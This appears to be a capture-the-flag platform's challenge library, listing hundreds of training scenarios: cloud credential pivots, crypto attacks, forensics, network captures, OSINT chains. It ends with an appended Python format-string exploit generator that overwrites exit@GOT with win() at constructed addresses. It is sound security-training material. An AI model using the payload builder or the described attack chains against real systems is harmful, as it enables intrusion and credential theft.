Challenge Library
330 specifications across all categories
AWS SCP policy
Cloud
Analyze an AWS Service Control Policy JSON to find the flag in a Sid field.
Azure RBAC role assignment
Cloud
Find the flag hidden in an Azure RBAC role assignment JSON document.
Cloud function misconfig
Cloud
Exploit a misconfigured serverless cloud function to obtain the flag.
CloudFormation credentials leak
Cloud
Find the flag exposed as a CloudFormation parameter default value.
Cognito unauthenticated role
Cloud
Parse a Cognito identity pool config to find the flag in the unauthenticated role ARN.
Cross-account trust no ExternalId
Cloud
Spot the confused deputy vulnerability in a cross-account trust policy and find the flag.
Hardcoded credentials in git history → S3 pivot
Cloud
A developer accidentally committed a .env file containing AWS credentials to a git repository. Player inspects the commit history, extracts the credentials, then accesses a private S3 bucket to retrieve the flag.
IAM policy misconfig
Cloud
Exploit an overly permissive IAM policy to access the flag.
IAM wildcard policy → Lambda env pivot → S3 exfil
Cloud
A three-hop cloud attack chain: an overprivileged IAM policy with lambda:* wildcards exposes a function's configuration including hardcoded S3 credentials in env vars. Player enumerates the IAM policy, pivots to the Lambda function config, extracts S3 credentials, then downloads the flag from a private bucket.
IMDS credential theft → S3 lateral pivot
Cloud
An EC2 IMDSv1 endpoint is accessible without token protection. Player traverses /latest/meta-data/iam/, retrieves temporary IAM credentials, then pivots to a private S3 bucket using those credentials to download the flag.
Kubernetes RBAC misconfiguration → S3 pivot
Cloud
A Kubernetes cluster has an overprivileged service account with secrets:get across all namespaces. Player reads a K8s Secret containing AWS credentials, base64-decodes them, then pivots to a private S3 bucket to retrieve the flag.
Lambda env var leak → S3 lateral pivot
Cloud
A misconfigured serverless function exposes its environment variables or source code through an unauthenticated debug endpoint. Player discovers S3 credentials in the env vars, then accesses the private bucket to retrieve the flag.
Lambda role excessive permissions
Cloud
Audit an overly permissive Lambda execution role policy to extract the flag from a Sid.
Metadata token leak
Cloud
Use a leaked cloud instance metadata token to retrieve the flag.
S3 bucket leak
Cloud
Find a flag exposed in a public or misconfigured S3 bucket.
S3 bucket policy public access
Cloud
Spot the public read misconfiguration in an S3 bucket policy hiding the flag.
Secrets Manager resource policy
Cloud
Read a Secrets Manager resource policy to find the flag in a condition value.
Terraform state leak (service mode)
Cloud
Leaked Terraform state file exposed in a misconfigured S3 bucket. Player enumerates the bucket, downloads terraform.tfstate, and extracts the flag from the sensitive admin_token output.
Terraform state sensitive output
Cloud
Inspect a Terraform state file to recover the flag from a sensitive output value.
Dockerfile secret leak
Docker
Discover a secret leaked in a Dockerfile intermediate build layer.
Exposed Docker socket
Docker
Find a flag exposed through a misconfigured Docker socket.
Misconfigured volume
Docker
Exploit a misconfigured Docker volume mount to access the flag.
Privileged container
Docker
Escape a privileged container to retrieve the flag from the host.
Exposed dashboard
Kubernetes
Access an exposed service dashboard to find the hidden flag.
RBAC misconfig
Kubernetes
Exploit a Kubernetes RBAC misconfiguration to read the secret flag.
Secret in configmap
Kubernetes
Extract a flag stored in plaintext inside a Kubernetes ConfigMap.
Service account abuse
Kubernetes
Abuse an overprivileged Kubernetes service account to get the flag.
Hidden branch
Logic
Find and trigger a hidden code branch to reveal the flag.
License key generation
Logic
Reverse engineer a license key algorithm to generate a valid key.
Password check
Logic
Reverse engineer a binary password check to derive the correct input.
Patch required
Logic
Patch a binary instruction to bypass a check and reveal the flag.
Base layered encoding
Obfuscation
Decode multiple nested base encodings to recover the flag.
Custom VM
Obfuscation
Reverse engineer custom virtual machine bytecode to get the flag.
String encoding
Obfuscation
Decode an obfuscated string encoding to find the flag.
XOR chain
Obfuscation
Reverse an XOR chain obfuscation to extract the hidden flag.
ECDSA nonce k reuse attack
Asymmetric
Recover the ECDSA private key from two signatures sharing the same nonce k.
Faulty RSA signature
Asymmetric
Exploit a faulty RSA signature implementation to extract the key.
RSA broadcast attack
Asymmetric
Mount a Hastad broadcast attack on RSA to recover the plaintext flag.
RSA low entropy primes
Asymmetric
Factor weak RSA primes generated with low entropy to decrypt.
RSA no padding
Asymmetric
Exploit textbook RSA without padding to recover the plaintext flag.
RSA small exponent
Asymmetric
Exploit RSA with a small public exponent (e=3) to decrypt the flag.
Caesar variant
Classical
Decrypt a Caesar cipher variant to find the hidden flag.
Columnar transposition
Classical
Reverse a columnar transposition cipher to decode the flag.
Monoalphabetic substitution cipher
Classical
Decrypt a monoalphabetic substitution ciphertext using frequency analysis.
Vigenère
Classical
Break a Vigenère cipher to recover the plaintext flag.
LCG weak PRNG
PRNG & Entropy
Reverse a Linear Congruential Generator to recover the flag from PRNG outputs.
Timestamp seed PRNG
PRNG & Entropy
Predict Python random output by brute-forcing a Unix timestamp seed.
Weak randomness in token
PRNG & Entropy
Exploit weak randomness in token generation to forge the flag.
Custom MAC flaw
Protocol Flaws
Exploit a broken custom MAC scheme to forge an authenticated message.
DH small subgroup
Protocol Flaws
Exploit a Diffie-Hellman small subgroup attack to recover the key.
HMAC length extension
Protocol Flaws
Perform a hash length extension attack to forge an HMAC.
Insecure key exchange
Protocol Flaws
Exploit a flawed key exchange to recover the shared session key.
JWT crypto misuse
Protocol Flaws
Exploit a JWT cryptographic flaw to forge an authentication token.
bcrypt pepper leak
Symmetric
Find the bcrypt pepper leaked in a config comment and verify it against the hash.
CBC padding oracle
Symmetric
Mount a CBC padding oracle attack to decrypt the flag.
CTR nonce reuse
Symmetric
Exploit CTR mode nonce reuse to recover the plaintext flag.
ECB leak
Symmetric
Exploit AES-ECB block reuse patterns to recover the plaintext flag.
Hardcoded key
Symmetric
Find a hardcoded encryption key in source code to decrypt the flag.
Key reuse across users
Symmetric
Exploit a shared encryption key across users to recover the flag.
Linux shadow file (sha512crypt)
Symmetric
Flag embedded as the sha512crypt ($6$) password hash of a target user in a synthetic /etc/shadow file. Solver parses the shadow format, extracts the $6$ hash, and cracks it with hashcat mode 1800 or john --format=sha512crypt.
MD5 collision artifact
Symmetric
Identify an MD5 collision between two blocks and extract the flag from the suffix.
NTLM credential dump
Symmetric
Flag embedded as the NT password hash of a target user in a secretsdump-style credential dump (username:RID:LM_HASH:NT_HASH:::). Solver identifies the target account, extracts the NT hash, and cracks it with hashcat mode 1000 (MD4 of UTF-16LE password) or passes the hash.
Weak KDF
Symmetric
Exploit a weak key derivation function to crack the encryption.
XOR key reuse
Symmetric
Exploit XOR key reuse across multiple ciphertexts to recover the flag.
Corrupted archive
Archive Analysis
Repair a corrupted archive and extract the hidden flag.
Nested archive
Archive Analysis
Extract nested compressed archives to reach the flag inside.
Weak zip password
Archive Analysis
Crack a weak ZIP password to access the protected flag file.
ZIP archive forensics
Archive Analysis
Flag hidden inside a ZIP archive: comment field, disguised filename, local extra field, or password-protected nested archive.
ext2/ext3 superblock analysis
Disk
Flag embedded in the ext2/ext3 superblock volume label field (offset 0x78, 16 bytes) and last_mounted field (offset 0x88, 64 bytes). Solver must identify the 0xEF53 magic number and navigate to the known fixed offsets to recover the flag.
FAT deleted file entry recovery
Disk
Flag stored in the cluster data of a deleted FAT 8.3 directory entry (first byte 0xE5). Solver must parse the 32-byte directory entry to locate the first cluster number, then read the corresponding data sector.
FAT32 boot sector analysis
Disk
Flag hidden in the FAT32 BIOS Parameter Block OEM name field (offset 3–10, 8 bytes) and repeated in the bootstrap code area. Solver must locate the BPB structure in the raw image and extract the flag bytes at the known fixed offset.
File slack space recovery
Disk
Flag appended in the file slack space — the unused bytes between the end of a file's content and the end of its allocated cluster. Solver must calculate the cluster size, locate the file end offset, and extract the bytes that follow up to the cluster boundary.
MBR bootstrap code analysis
Disk
Flag embedded in the MBR bootstrap code area (offset 0x000–0x1BD). Solver reads the raw MBR, verifies the 0x55AA signature, and extracts the flag from the bootstrap region using strings or a hex editor.
NTFS MFT entry analysis
Disk
Flag embedded in a synthetic NTFS MFT record — located in the resident $DATA attribute (type 0x80) and/or $FILE_NAME attribute. Solver must parse the MFT record structure to recover it.
DOCX revision comment forensics
Document Forensics
Flag embedded as the text of a Word revision comment in word/comments.xml. Visible via the Review panel in Word/LibreOffice, or by extracting comments.xml from the DOCX ZIP.
DOCX revision history (track changes)
Document Forensics
Flag hidden inside a deleted run (w:del / w:delText) in the document track-changes markup. Visible via Show Markup in Word, or by searching for <w:delText> in the raw XML.
PDF comment stream forensics
Document Forensics
Flag embedded as a PDF comment line (% prefix) appended to the raw PDF byte stream. Not visible in a PDF viewer but readable with strings or a hex editor.
PDF hidden AcroForm field forensics
Document Forensics
Flag stored as the /V value of a hidden AcroForm text widget (/FT /Tx, /F 2) appended as a PDF incremental update. Invisible in any PDF viewer; readable via qpdf --json or pdf-parser.py.
PDF incremental update revision forensics
Document Forensics
Two-revision PDF: revision 1 contains the flag in the content stream; revision 2 replaces that stream with innocent text. PDF viewers show only revision 2; forensic analysis of bytes before the first %%EOF recovers revision 1.
PDF JavaScript action forensics
Document Forensics
Flag stored as a JavaScript variable inside a /JavaScript action object appended as a PDF incremental update. Not executed by the viewer; recoverable with pdfid.py, pdf-parser.py, or qpdf --json.
XLSX cell comment forensics
Document Forensics
Flag embedded as the text of a cell comment (note) anchored on cell A1 in xl/comments1.xml. Visible by hovering over A1 in Excel/LibreOffice, or by inspecting comments1.xml directly.
XLSX hidden cell forensics (white-on-white)
Document Forensics
Flag hidden in cell Z1 formatted with white font on white background — invisible unless the cell is selected or reformatted. If hidden_sheet=true the entire worksheet must be unhidden first.
XLSX hidden worksheet forensics
Document Forensics
Flag in cell A1 of a hidden worksheet (state="hidden" in xl/workbook.xml). The sheet is invisible in the tab bar but can be revealed via Format > Sheet > Unhide in Excel/LibreOffice.
XLSX named range forensics
Document Forensics
Flag stored as the value of a defined name (_secret) in xl/workbook.xml. Visible via the Name Manager in Excel/LibreOffice or by inspecting workbook.xml directly.
XLSX very-hidden worksheet forensics
Document Forensics
Flag in cell A1 of a very-hidden worksheet (state="veryHidden" in xl/workbook.xml). The sheet does not appear in the Unhide dialog — solver must inspect workbook.xml directly and change or remove the state attribute.
File carving (JPEG fragment)
File Carving
Flag embedded in the JFIF COM comment field (marker FF FE) of a JPEG fragment hidden in unallocated disk space. Solver must carve the file using SOI/EOI markers and extract the comment with exiftool or strings.
Hidden ZIP in image
File Carving
Extract a hidden ZIP archive embedded inside an image file.
DOCX core metadata forensics
File Metadata
Flag hidden in the DOCX core properties XML (docProps/core.xml). Solver extracts the document package and reads the keywords, subject, or description field with exiftool or direct XML inspection.
DOCX extended app properties forensics
File Metadata
Flag hidden in the extended application properties (docProps/app.xml), specifically in the Company field. Visible via exiftool or by extracting app.xml from the DOCX ZIP.
EXIF metadata
File Metadata
Find a flag hidden in JPEG EXIF metadata fields.
PDF metadata forensics
File Metadata
Flag hidden in the PDF /Info dictionary (Author, Keywords, or Subject field). Solver reads document metadata with exiftool or pdfinfo.
PNG metadata stego
File Metadata
Extract a flag hidden in PNG chunk metadata fields.
XLSX core metadata forensics
File Metadata
Flag hidden in the XLSX core properties XML (docProps/core.xml). Solver extracts the spreadsheet package and reads the keywords or description field with exiftool or direct XML inspection.
Brute → pivot
Logs & SIEM
Trace a brute-force attack followed by lateral movement in system logs.
C2 beaconing detection
Logs & SIEM
Identify a C2 beacon in network flow logs by detecting periodic connections with consistent jitter to an external IP.
Cron persistence
Logs & SIEM
Identify a malicious cron job used for persistence in system logs.
DNS exfil trace
Logs & SIEM
Detect DNS-based data exfiltration in captured DNS query logs.
DNS exfiltration trace
Logs & SIEM
Detect and decode a DNS-based data exfiltration channel by identifying high-entropy subdomain patterns and reassembling the exfiltrated payload.
Group privilege escalation
Logs & SIEM
Trace unauthorized group membership changes enabling privilege escalation.
Hash chain break
Logs & SIEM
Find the broken link in a log hash chain to locate tampering.
Lateral movement trace
Logs & SIEM
Trace lateral movement through system logs to find the flag.
Log injection
Logs & SIEM
Detect injected log entries to uncover the attacker's hidden flag.
Log rotation gap
Logs & SIEM
Detect a gap created by log rotation manipulation to find the flag.
Log tampering
Logs & SIEM
Detect tampered log entries and recover the original flag.
Pass-the-hash simulation
Logs & SIEM
Trace a simulated pass-the-hash attack through authentication event logs.
Privilege escalation trace
Logs & SIEM
Follow privilege escalation events in logs to recover the flag.
Ransomware initial access
Logs & SIEM
Detect the initial foothold of a ransomware operator via WMI execution, scheduled task creation, and encoded PowerShell in Windows event logs.
Service persistence
Logs & SIEM
Identify a persistence mechanism hidden in service configuration logs.
Service persistence trace
Logs & SIEM
Detect a persistence mechanism planted via a new Windows service registration following a privilege escalation event.
Shadow access detection
Logs & SIEM
Identify unauthorized access to the shadow password file in logs.
sudo timestamp reuse
Logs & SIEM
Detect sudo timestamp manipulation in authentication logs.
SUID escalation trace
Logs & SIEM
Find SUID binary abuse leading to privilege escalation in audit logs.
Timestamp skew
Logs & SIEM
Identify timestamp anomalies in logs to reconstruct attack timing.
Web attack trace
Logs & SIEM
Reconstruct a web application attack chain from access logs and WAF events: SQL injection → path traversal → web shell upload → post-exploitation command.
Environment block memory leak
Memory
Flag embedded in the process environment block; variable name and value encoding are obfuscated at higher difficulties.
Password in memory
Memory
Find a plaintext password stored in a process memory dump.
Process injection detection
Memory
Identify a malicious process injection event in a memory image.
Split-chunk memory artifact
Memory
Flag split into N chunks scattered across the dump; each difficulty tier changes the marker scheme and chunk ordering strategy.
Volatility extraction
Memory
Extract a hidden flag from a memory dump using Volatility.
Wide-string memory leak
Memory
Flag stored as a UTF-16LE wchar_t string in a process heap dump; strings without -e l will not reveal it.
XOR-encoded memory artifact
Memory
Flag XOR-encoded with a 1-byte key stored visibly elsewhere in the dump; solver must locate the key and apply XOR.
ARP spoofing detection
Network
ARP poisoning captured in PCAP; flag encoded in crafted MAC address or ARP payload field.
DNS tunneling detection
Network
Detect and decode a flag hidden in DNS tunnel traffic.
FTP data exfiltration
Network
"Generate PCAP of FTP session with flag in RETR response body."
gRPC traffic analysis
Network
gRPC over HTTP/2 captured; flag embedded in a protobuf field within a request or response frame.
HTTP session reconstruction
Network
Reconstruct an HTTP session from a PCAP to find the flag.
ICMP covert channel
Network
"Generate PCAP with flag hidden in ICMP echo request data payload. Noise is benign TCP/UDP traffic."
IRC botnet C2
Network
"Generate PCAP of IRC session with flag in PRIVMSG body; hard mode: base64-encoded."
Kerberoasting AS-REP
Network
"Generate PCAP of Kerberos AS-REP exchange with flag base64-encoded in enc-part cipher field."
LDAP query enumeration
Network
LDAP query/response PCAP; flag stored in a custom attribute value returned by the directory.
mDNS service reconnaissance
Network
mDNS/Bonjour traffic captured; flag encoded in a TXT record of an advertised service.
Modbus register leak
Network
"Generate Modbus TCP PCAP with flag encoded as register byte values in a Read Holding Registers response."
PCAP corruption repair
Network
"Generate a structurally corrupted PCAP (truncated, fragmented records, or invalid headers); player must repair the binary before analysis."
PCAP credential extraction
Network
Analyze a network capture to extract plaintext credentials.
PCAP FTP credential leak
Network
Analyze an FTP session PCAP to find the flag in a server response.
PCAP gRPC metadata leak
Network
Parse HTTP/2 gRPC frames in a PCAP to find the flag in a custom metadata header.
PCAP IRC exfiltration
Network
Find the flag exfiltrated via an IRC PRIVMSG in a captured network session.
PCAP Kerberoasting ticket
Network
Inspect a Kerberos AS-REP in a PCAP to find the flag in the encrypted ticket field.
PCAP LDAP data exfil
Network
Inspect an LDAP search response PCAP to extract the flag from a DN attribute.
PCAP mDNS TXT record
Network
Extract the flag from an mDNS TXT record response in a PCAP capture.
PCAP Modbus ICS data
Network
Decode Modbus register values from a PCAP to reconstruct the hidden flag.
PCAP SIP VoIP leak
Network
Inspect a SIP REGISTER packet in a PCAP to extract the flag from the Contact header.
PCAP SMTP email interception
Network
Intercept an SMTP session PCAP and find the flag in an email Subject.
PCAP Telnet session
Network
Reconstruct a Telnet terminal session from a PCAP to find the flag.
PCAP TLS session key recovery
Network
Use a simulated NSS keylog entry in a PCAP comment to decrypt the TLS flag.
PCAP WebSocket message
Network
Parse WebSocket frames from a PCAP to recover the flag in a text message.
Raw TCP stream analysis
Network
Flag transmitted in a generic raw TCP session payload; solver follows the stream and extracts plaintext.
SIP call interception
Network
SIP INVITE exchange captured; flag encoded in SDP body or custom SIP header value.
SMTP exfiltration
Network
"Generate PCAP of SMTP session with flag in Subject header, optionally MIME-encoded."
Telnet credential intercept
Network
Telnet session captured in PCAP; flag delivered character-by-character in login exchange.
TLS fingerprint anomaly
Network
Identify a suspicious TLS fingerprint anomaly in captured traffic.
TLS session key leak
Network
PCAP of TLS session provided with NSS key log file; player decrypts traffic in Wireshark to extract flag.
WebSocket data exfiltration
Network
"Generate PCAP with HTTP 101 upgrade followed by WebSocket text frame carrying flag."
Alpha channel LSB stego
Steganography
Flag embedded in LSB of the alpha transparency channel; image appears fully opaque.
Bit plane image stego
Steganography
Flag hidden in bit plane N (1–4) of blue channel; revealed via stegsolve bit-plane viewer.
DCT block image stego
Steganography
Flag embedded in LSB of DCT AC coefficients across 8×8 pixel blocks; no JPEG quantisation loss.
DOCX acrostic steganography
Steganography
Flag encoded as an acrostic: the first letter of each paragraph in order spells the flag. Solver reads the document, extracts the first character of every paragraph, and concatenates them.
DOCX hidden text forensics
Steganography
Flag hidden in a paragraph with the w:vanish run property (hidden text). Invisible in normal Word view; revealed via Format > Hidden text, or direct XML inspection of word/document.xml.
LSB RGB stego
Steganography
Flag embedded in LSB of all three RGB channels sequentially; extracted with zsteg.
PDF first-letter acrostic forensics
Steganography
Flag encoded as the first letter of every Nth word across the document body — a visual acrostic. Solver must extract the body text and collect the correct first-letter sequence.
PDF hidden text layer forensics
Steganography
Flag rendered as white text on a white background in the PDF content stream — invisible in a normal PDF viewer but present in the page object stream.
Steganography
Steganography
Uncover a flag concealed within an image using steganographic techniques.
Text acrostic steganography
Steganography
Flag hidden as an acrostic: the first letter of each non-empty line spells the flag.
Text whitespace steganography
Steganography
Flag encoded using zero-width Unicode characters (U+200B=bit-1, U+200C=bit-0) hidden inside normal-looking text.
WAV echo stego
Steganography
Flag encoded via echo-hiding: each bit modulates the delay of a faint echo added to the carrier.
WAV LSB stego
Steganography
Extract a flag hidden in the least significant bits of a WAV file.
WAV metadata stego
Steganography
Flag hidden in WAV RIFF LIST/INFO chunk metadata (ICMT or INAM+IART base64-split).
WAV spectrogram stego
Steganography
Flag encoded as visible text in the audio spectrogram via additive frequency synthesis.
XOR two-image stego
Steganography
Two companion PNG files whose pixel-wise XOR reveals the hidden flag.
Bacon cipher
Encoding
Decode a Bacon A/B binary cipher to find the hidden flag.
Baudot encoding
Encoding
Decode Baudot/ITA2 5-bit encoded data to find the flag.
Brainfuck encoding
Encoding
Execute a Brainfuck program to reveal the hidden flag output.
Custom encoding
Encoding
Decode a multi-layer custom encoding scheme to find the flag.
Leetspeak obfuscation
Encoding
Reverse leet-speak character substitutions to recover the flag.
Morse encoding
Encoding
Decode a Morse code message (dots and dashes) to reveal the flag.
Multi-layer encoding chain
Encoding
Reverse multiple stacked encoding layers to extract the flag.
NATO phonetic alphabet
Encoding
Decode NATO phonetic words to spell out the hidden flag.
QR code artifact
Encoding
Scan a QR code image to retrieve the hidden flag.
Zero-width steganography
Encoding
Find a flag hidden in invisible Unicode zero-width characters.
CVE Exploitation
Corporate Pentest
Single CVE-vulnerable box deployed behind a WireGuard VPN gateway. The attacker connects via VPN and has direct access to the target box — no pivot required. Ideal for focused CVE exploitation training on a specific Vulhub service. The deployment URL is the VPN server endpoint; VPN credentials are provided in the challenge description.
OFFSEC Easy — 1 internal box via pivot
Corporate Pentest
Easy OFFSEC topology: WireGuard VPN → pivot_box (dual-homed) → 1 Vulhub box on internal network. Player must compromise pivot first, then pivot to internal target. Flag chain: collect /flag_proof from pivot + internal box, submit both proofs to flag_validator.
OFFSEC Hard — 2 internal boxes via pivot
Corporate Pentest
Hard OFFSEC topology: WireGuard VPN → pivot_box → 2 Vulhub boxes on internal network. All internal targets require pivot compromise. Player collects proofs from 3 boxes.
OFFSEC Insane — 2 internal + 1 external box
Corporate Pentest
Insane OFFSEC topology: WireGuard VPN → pivot_box + 1 external Vulhub reachable from VPN + 2 internal Vulhub boxes only via pivot. Player must exploit all 4 boxes and submit proofs to flag_validator.
OFFSEC Medium — 1 internal + 1 external box
Corporate Pentest
Medium OFFSEC topology: WireGuard VPN → pivot_box + 1 external Vulhub (both reachable from VPN) + 1 internal Vulhub (only via pivot). Player collects proofs from all 3 boxes and submits to flag_validator.
Chat message OSINT
OSINT
A mobile messaging app shows conversations between contacts. One message in a specific conversation contains the flag, either in plain text or lightly encoded. The player browses conversations and identifies the relevant message. Difficulty: easy.
Cloud four-service pivot chain IMDS to Lambda to K8s to S3
OSINT
Four-hop cloud attack chain: IMDS provides Lambda invocation credentials, Lambda env vars expose a K8s service account token, K8s secret holds S3 credentials, and the S3 document contains an insane-encoded flag.
Cloud IMDS credential theft
OSINT
A cloud instance metadata service (AWS IMDSv1) is directly accessible (simulating an SSRF target or an exposed service). The player browses the /latest/meta-data/ tree to find the attached IAM role, retrieves the temporary credentials, and extracts the flag embedded in the secret_access_key.
Cloud IMDS credential theft to S3 to git repository chain
OSINT
Three-hop cloud chain: IMDS exposes temporary S3 credentials, S3 document references a private git repository URL, and the flag is hidden in git commit history.
Corporate email to S3 artifact pivot
OSINT
Player reads a corporate inbox and finds an internal email referencing a file stored in an S3 bucket. The file contains the flag.
Corporate website employee OSINT
OSINT
A company website exposes a Team/About page with employee profiles. One of the profiles contains a flag hidden in the bio or in an HTML comment. The player inspects the profiles, source code, and page metadata.
Corporate website to LDAP to employee inbox chain
OSINT
Three-service corporate investigation: team page reveals an employee username, LDAP directory contains that user's inbox password as a hidden attribute, and the corporate inbox contains the flag in an email.
Cross-platform social username pivot
OSINT
Player receives a seed clue (Instagram profile name or post) and must pivot to the same persona's Twitter/X account to find the flag embedded in a profile field.
Darknet alias to pastebin pivot
OSINT
Player browses a darknet forum to find a post linking to a pastebin paste. The paste contains the flag embedded among realistic leaked data.
E-commerce order to confirmation email pivot
OSINT
Player enumerates fake shop orders to find an order ID, then locates the corresponding order confirmation email in the webmail inbox containing the flag.
E-commerce to cloud infrastructure to chat flag chain
OSINT
Atypical five-service chain mixing commercial and cloud infrastructure: shop order reveals a git repository, git exposes IMDS credentials, IMDS leads to S3, and an S3 document references a chat conversation with the insane-encoded flag.
Five-platform digital dossier reconstruction
OSINT
Maximum digital footprint reconstruction: five social/corporate/technical platforms converge on an OAuth private_data field containing the insane-encoded flag. Player builds a complete identity dossier step by step.
Full corporate breach five-service chain
OSINT
Five-hop investigation: corporate team page → LDAP credential extraction → git S3 keys → S3 document reference → inbox email with the encoded flag. Full corporate breach simulation.
Full social footprint reconstruction across 4 platforms
OSINT
Four-hop social investigation: Twitter bio references Instagram, Instagram caption reveals a chat contact, a chat message links to a pastebin paste, and the paste contains the encoded flag.
Geo-OSINT map forensic note
OSINT
An interactive map displays points of interest in a geographic area. A forensic analyst note in the sidebar or a POI reference field contains the flag, embedded inline or as a base64 string. The player explores the map, reads POI popups and sidebar notes, and extracts the flag. Difficulty: medium.
Git commit reference to pastebin data leak
OSINT
A developer referenced a pastebin paste in a git commit message or commit log comment. Player traverses the commit history, finds the paste URL, and retrieves the flag from the paste content.
Git history secret discovery
OSINT
A code repository platform hosts a project where a developer accidentally committed a .env file containing credentials, then deleted it in a subsequent commit. The flag survives in the git history. The player clones the repository and inspects past commits.
Hardcoded S3 credentials in git repo
OSINT
A developer accidentally committed S3 credentials to a git repository. Player finds the credentials in git history, then uses them to access a private S3 bucket containing the flag.
Infrastructure identity chain LDAP to OAuth to K8s to git to pastebin
OSINT
Five-service identity-to-infrastructure chain: anonymous LDAP recon provides OAuth credentials, forged JWT exposes K8s SA token, K8s secret yields a git PAT, git commit references a pastebin paste with the hard-encoded flag.
JWT weak secret to K8s service account to git repository
OSINT
Three-service chain: crack a weak JWT secret to forge a privileged OAuth token, use the token to extract a Kubernetes service account secret, then authenticate to a private git repository using that secret to find the flag.
Kubernetes secret enumeration
OSINT
A Kubernetes cluster exposes a mock API. A leaked kubeconfig grants access via an overprivileged service account. The player enumerates namespaces, lists Secrets, and decodes the flag from base64 in a Secret object in the production namespace.
LDAP anonymous recon
OSINT
An LDAP server exposes its directory in anonymous read mode (intentional misconfiguration). The player enumerates OUs, user accounts, and service accounts via ldapsearch or the web browser. The flag is hidden in a custom attribute of a service account.
Map POI to Instagram photo geolocation
OSINT
Player explores a map to find a POI note referencing an Instagram account or hashtag. The Instagram profile contains a geotagged photo whose EXIF metadata embeds the flag.
Map POI to Instagram steganography to chat message chain
OSINT
Three-service chain combining physical and digital investigation: a map POI note hints at an Instagram photo with a steganographic clue, which leads to a chat contact; the chat conversation contains the flag.
OAuth JWT weak-secret crack
OSINT
A corporate OAuth2/OIDC server signs its JWTs with a too-short HS256 secret (6–8 chars). The player authenticates as a normal user, retrieves an access_token, cracks the secret offline via hashcat/wordlist, forges an admin token, and accesses the protected resource containing the flag in the custom_claims.
OSINT infrastructure pivot
OSINT
An anonymous read-enabled LDAP server exposes a service account whose custom attributes contain S3 credentials. The player enumerates the directory, extracts the credentials, then accesses the associated S3 bucket to download the file containing the flag. Difficulty: hard.
OSINT multi-service employee dossier
OSINT
The player cross-references three sources to reconstruct the identity of a target. They find the professional email address of an employee on the corporate website, trigger an OAuth password reset, intercept the reset link in the target's webmail inbox, authenticate on the OAuth server, and read the flag in the account's custom_claims. Difficulty: hard.
Pastebin credential leak
OSINT
A public pastebin service contains multiple pastes. One paste holds a leaked set of credentials or API key that encodes the flag. The player browses the paste index, reads paste content, and extracts the flag embedded inline in the text or as a labelled key. Difficulty: easy.
Pastebin pivot from email
OSINT
An email in the corporate webmail references a pastebin URL. The player reads the email to extract the paste slug, navigates to the pastebin service, and reads the paste content to find the flag. Difficulty: medium (cross-service correlation required).
SMTP inbox OSINT
OSINT
The player accesses a pre-loaded webmail interface with about ten corporate emails. One message contains a secret (token, credentials, flag) in its body or subject. The other messages are realistic decoys (HR, IT, alerts). Difficulty: easy.
Social photo to private chat pivot
OSINT
Player finds a Messenger/Telegram username in the persona's Instagram profile, then navigates to a chat conversation containing the flag embedded in a message.
Social trail cross-reference
OSINT
The Instagram profile of a target contains, hidden in their bio, an alias used on a darknet forum. The player identifies this alias, locates the posts of this account on the forum, and extracts the flag from a message posted in plaintext in a discussion thread. Difficulty: medium.
Underground identity reconstruction across 4 social platforms
OSINT
Player traces a threat actor from their public Twitter persona through Instagram to a darknet forum alias, then locates a private chat conversation where the encoded flag is hidden in a message.
WHOIS registrant to corporate employee lookup
OSINT
Player queries WHOIS for a domain and finds a registrant name/email. That person appears on the company team page with the flag hidden in their employee profile.
WHOIS to corporate directory to email pivot chain
OSINT
Three-step investigation: player queries WHOIS to identify the registrant, matches them to a corporate directory employee, then accesses the employee inbox to find the flag in an email.
WHOIS to LDAP to corporate email investigation
OSINT
Player correlates a domain registrant via WHOIS, enumerates LDAP to extract the person's email password, then accesses their inbox to find the flag in an email generated by email_dump.
Arbitrary write
Format Strings
“Require multiple %n (or %hn) writes to assemble the target address in memory.”
GOT overwrite
Format Strings
“Allow %n writes to overwrite the GOT entry of exit() with the address of win().”
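Payload construction for the two entries above (arbitrary write and GOT overwrite), as an added example that is not part of the challenge generator: the write is split into 2-byte %hn stores, the %K$ argument indices are solved by fixed-point iteration because they depend on the length of the format string itself, and a toy printf model checks the result. The exit@GOT and win() addresses, the argument offset 6 and the stack model (buffer at argument `offset`, addresses appended after the format text) are assumptions; on a real target the offset is found by probing with %1$p, %2$p and so on.

```python
import re
import struct

# Constructed, hypothetical addresses for a non-PIE x86-64 binary: the exit@GOT
# slot and the hidden win() function. They belong to no real challenge.
GOT_EXIT = 0x404018
WIN = 0x401196


def fmtstr_payload(offset: int, writes: dict, written: int = 0) -> bytes:
    """Format string that stores every {address: 32-bit value} in `writes`
    using 2-byte %hn writes.

    offset  -- printf argument index at which our own buffer starts on the
               stack (found beforehand by probing with %1$p, %2$p, ...)
    written -- characters printf has already emitted before the payload
    """
    chunks = []
    for addr, value in writes.items():
        for i in range(2):  # low 4 bytes; the upper half of a GOT slot is 0
            chunks.append((addr + 2 * i, (value >> (16 * i)) & 0xFFFF))
    chunks.sort(key=lambda c: c[1])  # ascending: each padding delta stays small

    fmt = ""
    for _ in range(8):  # the %K$ indices depend on the length of fmt itself
        base = offset + (len(fmt) + 7) // 8  # argument index of the 1st address
        new_fmt, count = "", written
        for i, (_, value) in enumerate(chunks):
            delta = (value - count) % 0x10000
            if delta:
                new_fmt += "%%%dc" % delta  # pad output by `delta` characters
                count += delta
            new_fmt += "%%%d$hn" % (base + i)  # store low 16 bits of count
        if new_fmt == fmt:
            break
        fmt = new_fmt
    else:
        raise RuntimeError("payload length did not converge")

    # NUL ends the format text; the addresses that follow stay on the stack as data
    body = fmt.encode().ljust((len(fmt) + 7) // 8 * 8, b"\0")
    return body + b"".join(struct.pack("<Q", addr) for addr, _ in chunks)


def simulate_printf(payload: bytes, offset: int, written: int = 0) -> dict:
    """Toy model of glibc printf(buf): the buffer sits on the stack at argument
    `offset`, so %K$ for K >= offset reads the payload's own 8-byte words.
    Handles only %<n>c padding and %K$hn stores; returns {address: 16-bit value}."""
    fmt = payload.split(b"\0", 1)[0].decode()
    memory, count = {}, written
    for m in re.finditer(r"%(\d+)c|%(\d+)\$hn", fmt):
        if m.group(1):
            count += int(m.group(1))
        else:
            slot = int(m.group(2)) - offset
            addr = struct.unpack_from("<Q", payload, 8 * slot)[0]
            memory[addr] = count & 0xFFFF
    return memory


def read_u32(memory: dict, addr: int) -> int:
    return memory.get(addr, 0) | (memory.get(addr + 2, 0) << 16)


if __name__ == "__main__":
    payload = fmtstr_payload(6, {GOT_EXIT: WIN})
    print(payload)
    mem = simulate_printf(payload, 6)
    print(hex(read_u32(mem, GOT_EXIT)))  # exit@GOT now holds win()
```

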